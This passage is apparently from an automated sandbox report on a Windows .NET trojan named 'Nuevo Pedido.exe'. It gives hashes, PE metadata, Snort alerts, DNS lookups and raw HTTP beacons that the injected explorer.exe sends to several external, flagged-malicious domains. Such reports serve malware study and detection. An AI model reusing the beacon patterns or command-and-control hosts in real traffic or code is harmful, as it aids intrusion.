                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | false | | high

                                Contacted IPs


                                Public

                                IP | Domain | Country | ASN | ASN Name | Malicious
                                185.53.179.91 | www.onlinedatingthaiweb.com | Germany | 61969 | TEAMINTERNET-ASDE | true
                                192.232.250.147 | thejohnmatt.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                185.53.178.53 | www.tremblock.com | Germany | 61969 | TEAMINTERNET-ASDE | true
                                3.64.163.50 | www.rcepjobs.com | United States | 16509 | AMAZON-02US | true
                                209.17.116.163 | www.downingmunroe.online | United States | 55002 | DEFENSE-NETUS | true

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version: 34.0.0 Boulder Opal
                                Analysis ID: 528617
                                Start date: 25.11.2021
                                Start time: 15:08:16
                                Joe Sandbox Product: CloudBasic
                                Overall analysis duration: 0h 10m 48s
                                Hypervisor based Inspection enabled: false
                                Report type: light
                                Sample file name: Nuevo Pedido.exe
                                Cookbook file name: default.jbs
                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of new started processes analysed: 26
                                Number of new started drivers analysed: 0
                                Number of existing processes analysed: 0
                                Number of existing drivers analysed: 0
                                Number of injected processes analysed: 1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode: default
                                Analysis stop reason: Timeout
                                Detection: MAL
                                Classification: mal100.troj.evad.winEXE@7/1@11/6
                                EGA Information: Failed
                                HDC Information:
                                • Successful, ratio: 18.3% (good quality ratio 16.3%)
                                • Quality average: 73%
                                • Quality standard deviation: 32.2%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes were analyzed; the report is missing behavior information

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                15:09:08 | API Interceptor | 22x Sleep call for process: Nuevo Pedido.exe modified

                                Joe Sandbox View / Context

                                IPs


                                Domains

                                No context

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
                                Process: C:\Users\user\Desktop\Nuevo Pedido.exe
                                File Type: ASCII text, with CRLF line terminators
                                Category: dropped
                                Size (bytes): 2239
                                Entropy (8bit): 5.354287817410997
                                Encrypted: false
                                SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                MD5: 913D1EEA179415C6D08FB255AE42B99D
                                SHA1: E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                SHA-256: 473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                SHA-512: 768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                Malicious: true
                                Reputation: moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.844153530186034
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Nuevo Pedido.exe
                                File size:444928
                                MD5:159c46c59cd8ecb7a2bce707de1bc370
                                SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
                                SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
                                SHA512:909c79f9172d2d525d25a02e050fd55d2043fbf257479de73a70bcb323984da620aac0abdb105194e88a5df8b135d5d27ee1e69ee56511211a89c4e911155417
                                SSDEEP:12288:ZRGvM0ReBZwHIRu6HfMTr6hNprMfGmzGixBFm:ZRIM0ReBZwHkHIrGholGi1
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.a..............0.................. ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x46ddfe
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x619F6582 [Thu Nov 25 10:29:22 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [ebp+0800000Eh], ch
                                add byte ptr [eax], al

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6ddac | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x5ec | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x6be14 | 0x6c000 | False | 0.883305302373 | data | 7.85660170333 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x6e000 | 0x5ec | 0x600 | False | 0.438802083333 | data | 4.21429058876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x70000 | 0xc | 0x200 | False | 0.041015625 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_VERSION | 0x6e090 | 0x35c | data | |
                                RT_MANIFEST | 0x6e3fc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                LegalCopyright | Copyright Rogers Peet
                                Assembly Version | 8.0.6.0
                                InternalName | MethodImplAttribut.exe
                                FileVersion | 5.6.0.0
                                CompanyName | Rogers Peet
                                LegalTrademarks |
                                Comments |
                                ProductName | Biblan
                                ProductVersion | 5.6.0.0
                                FileDescription | Biblan
                                OriginalFilename | MethodImplAttribut.exe

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                11/25/21-15:10:30.664595 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                11/25/21-15:11:10.632399 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49839 | 185.53.179.91 | 192.168.2.5

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 25, 2021 15:10:30.605460882 CET | 49784 | 80 | 192.168.2.5 | 185.53.178.53
                                Nov 25, 2021 15:10:30.622345924 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:30.623855114 CET | 49784 | 80 | 192.168.2.5 | 185.53.178.53
                                Nov 25, 2021 15:10:30.641732931 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:30.644892931 CET | 49784 | 80 | 192.168.2.5 | 185.53.178.53
                                Nov 25, 2021 15:10:30.664511919 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:30.664594889 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:30.664649963 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:30.664774895 CET | 49784 | 80 | 192.168.2.5 | 185.53.178.53
                                Nov 25, 2021 15:10:30.664819956 CET | 49784 | 80 | 192.168.2.5 | 185.53.178.53
                                Nov 25, 2021 15:10:30.682296038 CET | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                Nov 25, 2021 15:10:35.726473093 CET | 49786 | 80 | 192.168.2.5 | 3.64.163.50
                                Nov 25, 2021 15:10:35.746747017 CET | 80 | 49786 | 3.64.163.50 | 192.168.2.5
                                Nov 25, 2021 15:10:35.746944904 CET | 49786 | 80 | 192.168.2.5 | 3.64.163.50
                                Nov 25, 2021 15:10:35.747081041 CET | 49786 | 80 | 192.168.2.5 | 3.64.163.50
                                Nov 25, 2021 15:10:35.767386913 CET | 80 | 49786 | 3.64.163.50 | 192.168.2.5
                                Nov 25, 2021 15:10:35.767437935 CET | 80 | 49786 | 3.64.163.50 | 192.168.2.5
                                Nov 25, 2021 15:10:35.767457962 CET | 80 | 49786 | 3.64.163.50 | 192.168.2.5
                                Nov 25, 2021 15:10:35.767685890 CET | 49786 | 80 | 192.168.2.5 | 3.64.163.50
                                Nov 25, 2021 15:10:35.767745972 CET | 49786 | 80 | 192.168.2.5 | 3.64.163.50
                                Nov 25, 2021 15:10:35.788788080 CET | 80 | 49786 | 3.64.163.50 | 192.168.2.5
                                Nov 25, 2021 15:10:46.187716007 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.194947958 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.309931040 CET | 80 | 49816 | 209.17.116.163 | 192.168.2.5
                                Nov 25, 2021 15:10:49.310199976 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.310664892 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.426548958 CET | 80 | 49816 | 209.17.116.163 | 192.168.2.5
                                Nov 25, 2021 15:10:49.426577091 CET | 80 | 49816 | 209.17.116.163 | 192.168.2.5
                                Nov 25, 2021 15:10:49.426889896 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.427073956 CET | 49816 | 80 | 192.168.2.5 | 209.17.116.163
                                Nov 25, 2021 15:10:49.541748047 CET | 80 | 49816 | 209.17.116.163 | 192.168.2.5
                                Nov 25, 2021 15:10:59.691447973 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:10:59.895230055 CET | 80 | 49838 | 192.232.250.147 | 192.168.2.5
                                Nov 25, 2021 15:10:59.895332098 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:10:59.895478964 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:11:00.097284079 CET | 80 | 49838 | 192.232.250.147 | 192.168.2.5
                                Nov 25, 2021 15:11:00.399027109 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:11:00.648233891 CET | 80 | 49838 | 192.232.250.147 | 192.168.2.5
                                Nov 25, 2021 15:11:01.556123972 CET | 80 | 49838 | 192.232.250.147 | 192.168.2.5
                                Nov 25, 2021 15:11:01.556169987 CET | 80 | 49838 | 192.232.250.147 | 192.168.2.5
                                Nov 25, 2021 15:11:01.556250095 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:11:01.556274891 CET | 49838 | 80 | 192.168.2.5 | 192.232.250.147
                                Nov 25, 2021 15:11:10.581495047 CET | 49839 | 80 | 192.168.2.5 | 185.53.179.91
                                Nov 25, 2021 15:11:10.598289013 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5
                                Nov 25, 2021 15:11:10.598505020 CET | 49839 | 80 | 192.168.2.5 | 185.53.179.91
                                Nov 25, 2021 15:11:10.615405083 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5
                                Nov 25, 2021 15:11:10.615487099 CET | 49839 | 80 | 192.168.2.5 | 185.53.179.91
                                Nov 25, 2021 15:11:10.632355928 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5
                                Nov 25, 2021 15:11:10.632399082 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5
                                Nov 25, 2021 15:11:10.632415056 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5
                                Nov 25, 2021 15:11:10.632605076 CET | 49839 | 80 | 192.168.2.5 | 185.53.179.91
                                Nov 25, 2021 15:11:10.632667065 CET | 49839 | 80 | 192.168.2.5 | 185.53.179.91
                                Nov 25, 2021 15:11:10.649518013 CET | 80 | 49839 | 185.53.179.91 | 192.168.2.5

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 25, 2021 15:10:28.557399035 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:29.541821003 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:30.537902117 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:30.595156908 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:10:35.684943914 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:35.723468065 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:10:40.778733969 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:40.961405993 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:10:46.014628887 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:46.186077118 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:10:54.439486027 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:54.490019083 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:10:59.496768951 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:10:59.690080881 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:11:05.443424940 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:11:05.481781960 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:11:10.502841949 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:11:10.580288887 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
                                Nov 25, 2021 15:11:21.011703014 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
                                Nov 25, 2021 15:11:21.075328112 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Nov 25, 2021 15:10:28.557399035 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:29.541821003 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:30.537902117 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:35.684943914 CET | 192.168.2.5 | 8.8.8.8 | 0x71a6 | Standard query (0) | www.rcepjobs.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:40.778733969 CET | 192.168.2.5 | 8.8.8.8 | 0x9af3 | Standard query (0) | www.sosibibyslot.website | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:46.014628887 CET | 192.168.2.5 | 8.8.8.8 | 0x9e9c | Standard query (0) | www.downingmunroe.online | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:54.439486027 CET | 192.168.2.5 | 8.8.8.8 | 0x579a | Standard query (0) | www.blueprintroslyn.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:59.496768951 CET | 192.168.2.5 | 8.8.8.8 | 0xcd40 | Standard query (0) | www.thejohnmatt.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:05.443424940 CET | 192.168.2.5 | 8.8.8.8 | 0x841d | Standard query (0) | www.securebankofamericalog.site | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:10.502841949 CET | 192.168.2.5 | 8.8.8.8 | 0xdf5d | Standard query (0) | www.onlinedatingthaiweb.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:21.011703014 CET | 192.168.2.5 | 8.8.8.8 | 0x5040 | Standard query (0) | www.trenddoffical.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Nov 25, 2021 15:10:30.595156908 CET | 8.8.8.8 | 192.168.2.5 | 0xb6ee | No error (0) | www.tremblock.com | | 185.53.178.53 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:35.723468065 CET | 8.8.8.8 | 192.168.2.5 | 0x71a6 | No error (0) | www.rcepjobs.com | | 3.64.163.50 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:40.961405993 CET | 8.8.8.8 | 192.168.2.5 | 0x9af3 | Name error (3) | www.sosibibyslot.website | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:46.186077118 CET | 8.8.8.8 | 192.168.2.5 | 0x9e9c | No error (0) | www.downingmunroe.online | | 209.17.116.163 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:54.490019083 CET | 8.8.8.8 | 192.168.2.5 | 0x579a | Name error (3) | www.blueprintroslyn.com | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET | 8.8.8.8 | 192.168.2.5 | 0xcd40 | No error (0) | www.thejohnmatt.com | thejohnmatt.com | | CNAME (Canonical name) | IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET | 8.8.8.8 | 192.168.2.5 | 0xcd40 | No error (0) | thejohnmatt.com | | 192.232.250.147 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:05.481781960 CET | 8.8.8.8 | 192.168.2.5 | 0x841d | Name error (3) | www.securebankofamericalog.site | none | none | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:10.580288887 CET | 8.8.8.8 | 192.168.2.5 | 0xdf5d | No error (0) | www.onlinedatingthaiweb.com | | 185.53.179.91 | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:11:21.075328112 CET | 8.8.8.8 | 192.168.2.5 | 0x5040 | Name error (3) | www.trenddoffical.com | none | none | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.tremblock.com
                                • www.rcepjobs.com
                                • www.downingmunroe.online
                                • www.thejohnmatt.com
                                • www.onlinedatingthaiweb.com

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.5 | 49784 | 185.53.178.53 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:30.644892931 CET | 9620 | OUT | GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.tremblock.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:30.664594889 CET | 9620 | IN | HTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:10:30 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.5 | 49786 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:35.747081041 CET | 14112 | OUT | GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.rcepjobs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:35.767437935 CET | 14112 | IN | HTTP/1.1 410 Gone
                                Server: openresty
                                Date: Thu, 25 Nov 2021 14:10:35 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: close
                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 63 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 38 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 63 65 70 6a 6f 62 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7<html>9 <head>4c <meta http-equiv='refresh' content='5; url=http://www.rcepjobs.com/' />a </head>9 <body>38 You are being redirected to http://www.rcepjobs.coma </body>8</html>0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.5 | 49816 | 209.17.116.163 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:49.310664892 CET | 15995 | OUT | GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.downingmunroe.online
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:49.426548958 CET | 15996 | IN | HTTP/1.1 400 Bad Request
                                Server: openresty/1.17.8.2
                                Date: Thu, 25 Nov 2021 14:10:49 GMT
                                Content-Type: text/html
                                Content-Length: 163
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                3 | 192.168.2.5 | 49838 | 192.232.250.147 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:10:59.895478964 CET | 16019 | OUT | GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.thejohnmatt.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:01.556123972 CET | 16020 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Thu, 25 Nov 2021 14:11:01 GMT
                                Server: nginx/1.17.9
                                Content-Type: text/html; charset=UTF-8
                                Content-Length: 0
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN
                                X-Endurance-Cache-Level: 0
                                X-nginx-cache: WordPress
